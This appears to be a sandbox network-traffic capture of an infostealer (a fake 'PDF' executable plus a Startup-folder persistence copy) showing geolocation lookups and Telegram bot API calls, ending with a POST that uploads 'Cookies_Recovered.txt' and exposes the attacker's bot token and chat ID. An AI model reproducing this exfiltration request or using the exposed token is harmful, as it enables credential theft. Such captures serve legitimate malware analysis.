2025-01-13 11:08:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:21 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081290 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UvbEsQ%2FX0PntJq1VTg2lLugMrc91jDg%2F4Weum5ZKQY2XSzXvgPWodV0wqbv%2F9d%2B7oFz185FRoCu8hHcV9kH75uMJBvWwR1%2FCE2IxDFtziHFFs0QunXU7OTP%2FQw90Ov9mOjBhP8I9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed8be95d72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1712&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1634938&cwnd=217&unsent_bytes=0&cid=01982a27461d79f5&ts=158&x=0"
2025-01-13 11:08:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49755	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:22 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 11:08:22 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081291 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yvpvQCZpNS%2FwSFTZTbg3HeO8KVa1Pn8KS2F0aYJK2eYai%2BeZnS8nyaDks%2BVOYUi6L3zjdrrMTmfhvirjFm1DciMibWE8KRzX2HfKhWIHhEaPRzCnZbliTB6%2FbP5NqeF9%2BDH0H%2BiM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed927de572b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1842&rtt_var=704&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1540084&cwnd=217&unsent_bytes=0&cid=fdbd599a8312e4ae&ts=134&x=0"
2025-01-13 11:08:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49756	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:22 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 11:08:22 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081291 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rABAjmzrizh3RMauUTaGK8pO3w01M95Do%2BpxmQNrJ%2FRPtGP5n3G5dGE%2FQtqqw8%2BkdsBoJvwUZeH21F%2FCfwHkcmZTl2xKaZ0YQ71giLF7KFCfAw9pxIDSN%2FXDPyoI9SWQyrxlfKEG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed92ae2b8cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1762&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1607044&cwnd=244&unsent_bytes=0&cid=748dc914123c073d&ts=138&x=0"
2025-01-13 11:08:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49760	149.154.167.220	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:23 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-13 11:08:23 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 11:08:23 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-13 11:08:23 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:24 UTC	862	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081293 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GAacKOf5mq5WV8Ame1drhXpjjmYxBAOfOy0fPCHny%2FrOJa1k%2FqLi%2F6mFtQR4c44tZEaAKzJ2xaj%2BbvuruXADBRkvN6z6JNEv1C7J2c%2Fgez5s1j%2BKpU%2F3O4kiThsp2yzTb9MGUs7n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed9bdb904344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1693&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1655328&cwnd=47&unsent_bytes=0&cid=461da51b73a58723&ts=150&x=0"
2025-01-13 11:08:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49765	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:25 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081295 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1lOnUZmBQeCET9JnsaYSPkif5bgB%2F5hcKKsKh9WZIc0fnQxwcZQj36z6E1qJmMas6fhm06tFg3znal69id%2Fa4kRcyiPXOhgLnV0r%2FnYmk9vBk%2B0ZPqaTVtgExXBPDseVI8bn2p%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014eda5baf772b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1765&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1639528&cwnd=217&unsent_bytes=0&cid=e15c78ced7da104d&ts=158&x=0"
2025-01-13 11:08:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49767	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 11:08:27 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081296 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7dVH6NhwB5bYYTAiudn8e4m855aB5daZso8YOmY37ye%2FOMlSQ5nR8g2jEC4ZhdTLNsXXNLN%2B1Kxgtg81VIi5vbFsNHUMCTxwonk3%2BCwLrqeISUbu3qLqD0wMrcGXamTxiOV5LLXY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014edaec80341a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1579&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1839949&cwnd=241&unsent_bytes=0&cid=ca5b33dbb1c46e9c&ts=137&x=0"
2025-01-13 11:08:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49769	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:28 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081297 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrGh7y%2B%2BHkvnLVXpAOQowZJiQPNBkXEyLRpW4XRSEhjJCSgBQYVd4YuFl035YzubXn2EiZA9uk59%2Byj2pr%2BgSSQ59RqNy447ufPoi9kXT8gvGi9QiXz4Gs45%2BXA9vYZRVARabWv4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014edb7ec6c1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1595&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1810291&cwnd=153&unsent_bytes=0&cid=44375422c96b767c&ts=166&x=0"
2025-01-13 11:08:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49771	104.21.32.1	443	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:31 UTC	864	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081300 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxU6PDWdZHfRhFUv%2FVySG7XhxBabSYnLbeQNy4Ekgoz7bLxC6FeYSolNBSPNv3UvX%2F1669r5Oe4%2FQ3TX%2FJFDs6aZVNj361U2BupevLi4m8eSEFq%2FrJpU7Q%2FmMCcr3sN%2Blg0C4IO%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014edc7ca894344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1666&rtt_var=638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1698662&cwnd=47&unsent_bytes=0&cid=56882176e36fbb35&ts=154&x=0"
2025-01-13 11:08:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49773	149.154.167.220	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:32 UTC	350	OUT	POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd348fc5d06ecd Host: api.telegram.org Content-Length: 7046
2025-01-13 11:08:32 UTC	7046	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 34 38 66 63 35 64 30 36 65 63 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 30 37 38 31 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f Data Ascii: --------------------------8dd348fc5d06ecdContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:960781Date and Time: 13/01/2025 /
